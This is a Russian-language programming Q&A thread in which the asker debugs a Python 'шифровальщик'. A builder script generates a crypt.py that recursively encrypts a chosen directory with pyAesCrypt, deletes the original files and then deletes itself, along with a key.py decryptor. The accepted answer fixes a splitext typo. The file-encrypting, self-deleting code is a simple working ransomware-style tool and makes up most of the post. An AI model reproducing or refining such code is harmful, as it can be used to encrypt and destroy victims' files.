# не работает код python

Tags: python, python-3.x, криптография

Писал шифровальщик используя модуль `pyAesCrypt` и как бы не пытался понять ошибку ничего понять так и не удается. Сначала запускаю файл main_builder.py его код ниже

```py
direct = input("Write the root directory: ") # FIXME
password = input("Write the password: ")

with open("crypt.py", "w") as crypt:
    crypt.write('''
import os, sys
def crypt(file):
    import pyAesCrypt
    password = "''' + str(password) +'''"
    bufferSize = 512 * 1024
    pyAesCrypt.encryptFile(str(file), str(file)+".crp", password, bufferSize)
    print("[crypted] '" + str(file) + ".crp'")
    os.remove(file)
def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        if os.path.isfile(path): crypt(path)
        else: walk(path)
walk("''' + str(direct) +'''")

os.remove(str(sys.argv[0]))
                ''')
    print("[+] File 'crypt.py' successfully saved!")
with open("key.py", "w") as key:
    key.write('''
import os
def decrypt(file):
    import pyAesCrypt
    # line
    password = "''' + str(password) + '''"
    bufferSize = 512 * 1024
    pyAesCrypt.decryptFile(str(file), str(os.path.splittext(file)[0]), password, bufferSize)
    print("[decrypted '" + str(os.path.splittext(file)[0]) + "'")
    os.remove(file)
def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        if os.path.isfile(path):
            decrypt(path)
        else: walk(path)
walk("''' + str(direct) + '''")
        ''')
    print("[+] File 'key.py' successfully saved!")
```

затем как видите надо ввести директорию для шифрования, потом пароль. После этого создаются два файла *crypt.py* и *key.py* при выполнении файла *crypt.py* директория успешно зашифровывается, а вот при расшифровании т.е. выполнении файла *key.py* выводятся следующие ошибки:
[image: ошибки которые выводятся при выполнении key.py <code>python key.py</code>]

**В чем ошибка и как ее исправить?**

Comment: `except: pass` — ну так именно поэтому ошибок и не выдаёт, потому что вы запретили коду выводить ошибки.

Comment: @andreymal памагити

Comment: Убирайте `except: pass` и изучайте получившуюся ошибку

Comment: Module 'posixpath' has no attribute splittext" - предельно ясно.

Comment: @Эникейщик ну понятно posixpath не имеет атрибута splittext, а как исправить то?

Comment: что исправить? код? написать его так, что в нем не было os.path.splittext()

Comment: @Эникейщик а чем его можно заменить конкретно в этом примере?

Comment: откуда ж я знаю, чем можно заменить то, что должно делать непонятно что.

Answer (score 1, accepted):

"Ошибка" заключалась в следующих строчках: 
`pyAesCrypt.decryptFile(str(file), str(os.path.splittext(file)[0]), password, bufferSize)` 
`print("[decrypted '" + str(os.path.splittext(file)[0]) + "'")` 
функция `splittext()` пишется как `splitext()`, так сильно я на себя еще никогда не злился